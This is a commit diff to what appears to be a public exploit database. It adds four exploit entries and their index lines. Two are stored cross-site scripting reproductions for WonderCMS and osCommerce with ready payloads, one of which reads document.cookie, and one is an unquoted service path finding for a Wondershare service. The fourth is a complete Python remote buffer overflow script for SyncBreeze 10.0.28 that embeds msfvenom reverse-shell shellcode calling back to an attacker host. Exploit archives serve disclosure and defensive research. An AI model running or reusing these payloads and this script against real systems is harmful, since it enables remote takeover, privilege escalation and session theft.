DB: 2020-11-26

4 changes to exploits/shellcodes Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
2020-11-26 05:01:56 +00:00 · 2020-11-26 05:01:56 +00:00 · ce8af77d3e
commit ce8af77d3e
parent a41b8b4637
5 changed files with 235 additions and 0 deletions
--- a/exploits/php/webapps/49102.txt
+++ b/exploits/php/webapps/49102.txt
@ -0,0 +1,22 @@
+# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Mayur Parmar
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: PopOS
+
+Stored Cross-site scripting(XSS):
+Stored attacks are those where the injected script is permanently stored on the target servers,
+such as in a database, in a message forum, visitor log, comment field, etc.
+The victim then retrieves the malicious script from the server when it requests the stored information.
+Stored XSS is also sometimes referred to as Persistent XSS.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page Title.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")>
+3. Now go to the website and the XSS will be triggered.
--- a/exploits/php/webapps/49103.txt
+++ b/exploits/php/webapps/49103.txt
@ -0,0 +1,112 @@
+# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
+# Date: 2020-11-19
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://www.oscommerce.com/
+# Version: 2.3.4.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to admin panel.
+2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
+3- Enter the XSS payload into the title section and save it.
+
+==> Vulnerable Parameter <==
+
+title= (post parameter)
+
+==> HTTP Request <==
+
+POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 123
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: osCAdminID=s11ou44m0vrasducn78c6sg
+
+module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss
+
+==> Vulnerable Source Code <==
+
+<div id="contentText">
+    <table border="0" width="100%" cellspacing="0" cellpadding="2">
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td class="pageHeading">Newsletter Manager</td>
+            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td>
+          </tr>
+        </table></td>
+      </tr>
+      <tr>
+        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
+          <tr>
+            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+              <tr class="dataTableHeadingRow">
+                <td class="dataTableHeadingContent">Newsletters</td>
+                <td class="dataTableHeadingContent" align="right">Size</td>
+                <td class="dataTableHeadingContent" align="right">Module</td>
+                <td class="dataTableHeadingContent" align="center">Sent</td>
+                <td class="dataTableHeadingContent" align="center">Status</td>
+                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
+              </tr>
+                  <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td>
+                <td class="dataTableContent" align="right">3 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td>
+              </tr>
+                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'">
+                <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td>
+                <td class="dataTableContent" align="right">7 bytes</td>
+                <td class="dataTableContent" align="right">newsletter</td>
+                <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
+                <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
+                <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td>
+              </tr>
+              <tr>
+                <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2">
+                  <tr>
+                    <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td>
+                    <td class="smallText" align="right">Page 1 of 1</td>
+                  </tr>
+                  <tr>
+                    <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+                  </tr>
+                </table></td>
+              </tr>
+            </table></td>
+            <td width="25%" valign="top">
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr class="infoBoxHeading">
+    <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td>
+  </tr>
+</table>
+<table border="0" width="100%" cellspacing="0" cellpadding="2">
+  <tr>
+    <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
+  </tr>
+  <tr>
+    <td class="infoBoxContent"><br />Date Added: 11/19/2020</td>
+  </tr>
+</table>
+            </td>
+          </tr>
+        </table></td>
+      </tr>
+    </table>
+</div>
--- a/exploits/windows/local/49101.txt
+++ b/exploits/windows/local/49101.txt
@ -0,0 +1,27 @@
+# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
+# Date: 2020-11-24
+# Exploit Author: Luis Sandoval
+# Vendor Homepage: https://www.wondershare.com/
+# Software Link: https://www.wondershare.com/drfone/
+# Version: 10.7.1.321
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Service info:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Wondershare Driver Install Service help    ElevationService   C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe     Auto
+
+C:\Users\user>sc qc ElevationService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ElevationService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/webapps/49104.py
+++ b/exploits/windows/webapps/49104.py
@ -0,0 +1,70 @@
+# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
+# Date: 18-Sep-2020
+# Exploit Author: Abdessalam king(A.salam)
+# Vendor Homepage: http://www.syncbreeze.com
+# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
+# Version: 10.0.28
+# Tested on: Windows 7,windows xp,windows 10
+#72413372 [*] Exact match at offset 520
+#jmp esp FFE4 \xff\xe4
+#!mona modules
+#!mona find -s "\xff\xe4" -m libspp.dll
+#address esp => 10090C83
+#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
+-b "\x00\x0a\x0d\x25\x26\x2b\x3d"  EXITFUNC=thread
+#!/usr/bin/python
+import socket
+
+shell =""
+shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
+shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf"
+shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9"
+shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc"
+shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0"
+shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5"
+shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5"
+shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76"
+shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b"
+shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60"
+shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1"
+shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2"
+shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1"
+shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b"
+shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3"
+shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3"
+shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5"
+shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8"
+shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83"
+shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d"
+shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45"
+shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77"
+shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0"
+shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16";
+
+
+payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" *
+20 + shell +"\x90"*(1400-520-4-20-len(shell))
+req =""
+req += "POST /login HTTP/1.1\r\n"
+req += "Host: 192.168.1.20\r\n"
+req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0\r\n"
+req += "Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+req += "Accept-Language: en-US,en;q=0.5\r\n"
+req += "Accept-Encoding: gzip, deflate\r\n"
+req += "Referer: http://192.168.1.20/login\r\n"
+req += "Content-Type: application/x-www-form-urlencoded\r\n"
+req += "Content-Length: "+str(len(payload))+"\r\n"
+req += "Connection: keep-alive\r\n"
+req += "Upgrade-Insecure-Requests: 1\r\n"
+req += "\r\n"
+req += payload
+# print req
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",80))
+s.send(req)
+print s.recv(1024)
+
+s.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11206,6 +11206,7 @@ id,file,description,date,author,type,platform,port
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
 49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
 49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
+49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43326,3 +43327,6 @@ id,file,description,date,author,type,platform,port
 49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
 49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
 49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,
+49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
+49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
+49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,